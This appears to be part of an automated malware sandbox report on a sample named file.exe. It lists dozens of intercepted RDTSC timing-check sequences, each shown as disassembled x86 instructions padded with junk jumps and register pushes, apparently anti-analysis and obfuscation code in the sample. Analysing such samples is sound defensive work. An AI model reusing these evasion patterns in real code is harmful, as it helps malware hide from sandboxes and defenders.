                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5364 second address: 9D53DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2429065B48h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dx, FEBEh 0x00000030 jmp 00007F2429065B52h 0x00000035 push 00000000h 0x00000037 jmp 00007F2429065B53h 0x0000003c and di, 39A3h 0x00000041 call 00007F2429065B49h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F2429065B4Ah 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D53DC second address: 9D5461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F242906E928h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jng 00007F242906E935h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F242906E936h 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jng 00007F242906E93Ch 0x0000002c push edx 0x0000002d jnl 00007F242906E926h 0x00000033 pop edx 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5461 second address: 9D5465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5465 second address: 9D54D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jno 00007F242906E92Ch 0x0000000e movsx esi, di 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2663h], edx 0x00000019 mov ecx, esi 0x0000001b push 00000000h 0x0000001d mov edx, dword ptr [ebp+122D3495h] 0x00000023 push 00000003h 0x00000025 movsx esi, cx 0x00000028 push 4A96893Dh 0x0000002d jnl 00007F242906E92Eh 0x00000033 add dword ptr [esp], 756976C3h 0x0000003a call 00007F242906E92Bh 0x0000003f mov cx, 32FDh 0x00000043 pop edx 0x00000044 lea ebx, dword ptr [ebp+12456FA5h] 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F242906E931h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D54D7 second address: 9D54EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2429065B4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9828 second address: 9B9836 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F242906E926h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9836 second address: 9B983C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B983C second address: 9B9840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9840 second address: 9B984A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2429065B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46DF second address: 9F46E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46E3 second address: 9F46E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46E9 second address: 9F46EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F46EF second address: 9F46F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4846 second address: 9F484D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F484D second address: 9F4866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2429065B46h 0x0000000a popad 0x0000000b push ecx 0x0000000c jc 00007F2429065B46h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4CA4 second address: 9F4CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4DD7 second address: 9F4DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4F60 second address: 9F4F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4F64 second address: 9F4F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F50F5 second address: 9F50FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F53EC second address: 9F5402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2429065B4Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5402 second address: 9F5406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57C9 second address: 9F57D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57D0 second address: 9F57E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F242906E92Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57E4 second address: 9F57F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F57F2 second address: 9F5849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jnc 00007F242906E940h 0x0000000d jmp 00007F242906E938h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F242906E936h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5983 second address: 9F5987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5987 second address: 9F59B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F242906E94Bh 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F242906E937h 0x00000016 pop edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F3B second address: 9F5F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B56h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F60CD second address: 9F60E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F242906E938h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F63A0 second address: 9F63C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2429065B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F2429065B46h 0x00000014 jmp 00007F2429065B53h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F63C7 second address: 9F63CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB210 second address: 9FB22A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B55h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1A8 second address: 9CC1AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1AF second address: 9CC1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2429065B46h 0x0000000a popad 0x0000000b js 00007F2429065B4Eh 0x00000011 jne 00007F2429065B46h 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F2429065B52h 0x00000021 pushad 0x00000022 jmp 00007F2429065B4Eh 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1F0 second address: 9CC1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1F8 second address: 9CC1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC1FE second address: 9CC204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE573 second address: 9FE5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F2429065B56h 0x0000000f pushad 0x00000010 js 00007F2429065B46h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jc 00007F2429065B57h 0x00000024 push ebx 0x00000025 jmp 00007F2429065B4Fh 0x0000002a pop ebx 0x0000002b mov eax, dword ptr [eax] 0x0000002d push edx 0x0000002e jmp 00007F2429065B4Dh 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 pushad 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD64C second address: 9FD650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A028D5 second address: A028DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B61DE second address: 9B61E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B61E8 second address: 9B6216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F2429065B62h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jp 00007F2429065B46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D2A second address: A01D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F242906E926h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D4D second address: A01D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D56 second address: A01D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D64 second address: A01D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D68 second address: A01D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F242906E92Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F242906E939h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01D95 second address: A01D9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01F2C second address: A01F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02586 second address: A0258A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0258A second address: A025AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F242906E938h 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A025AF second address: A025CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2429065B50h 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007F2429065B46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A025CF second address: A025DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F242906E926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05082 second address: A050A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2429065B54h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A050A5 second address: A050BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F242906E92Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A050BF second address: A050DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2429065B50h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C33 second address: A05C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 pushad 0x00000008 movsx edx, dx 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C44 second address: A05C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05E5B second address: A05E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05F4E second address: A05F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05F52 second address: A05F58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05F58 second address: A05F5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06106 second address: A0610C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0610C second address: A06122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06122 second address: A06127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0667E second address: A06682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06682 second address: A06686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08AD1 second address: A08AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A087C1 second address: A087CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08AD5 second address: A08AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2429065B46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A094F1 second address: A09576 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F242906E933h 0x00000008 jmp 00007F242906E92Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnp 00007F242906E93Ch 0x00000016 js 00007F242906E936h 0x0000001c jmp 00007F242906E930h 0x00000021 nop 0x00000022 push 00000000h 0x00000024 call 00007F242906E92Eh 0x00000029 mov dword ptr [ebp+122D2E9Ah], edi 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F242906E928h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122D34F1h] 0x00000052 add dword ptr [ebp+122D2696h], ecx 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09576 second address: A0957A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A092A0 second address: A092B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F242906E92Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0957A second address: A09598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A092B5 second address: A092BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09598 second address: A0959C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0959C second address: A095BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F242906E930h 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F242906E926h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AB28 second address: A0AB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AB2E second address: A0AB8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F242906E934h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F242906E933h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F242906E928h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+1245D012h], ebx 0x00000036 push 00000000h 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AB8F second address: A0ABB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F2429065B4Ch 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2429065B50h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B33A second address: A0B344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F242906E926h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCAB second address: A0DCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCAF second address: A0DCBD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F242906E926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DCBD second address: A0DD0A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F2429065B48h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D275Ch], edx 0x0000002e push 00000000h 0x00000030 mov di, bx 0x00000033 push 00000000h 0x00000035 ja 00007F2429065B4Ch 0x0000003b xchg eax, esi 0x0000003c push ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8A08 second address: 9C8A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F242906E926h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10142 second address: A10154 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F2429065B4Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
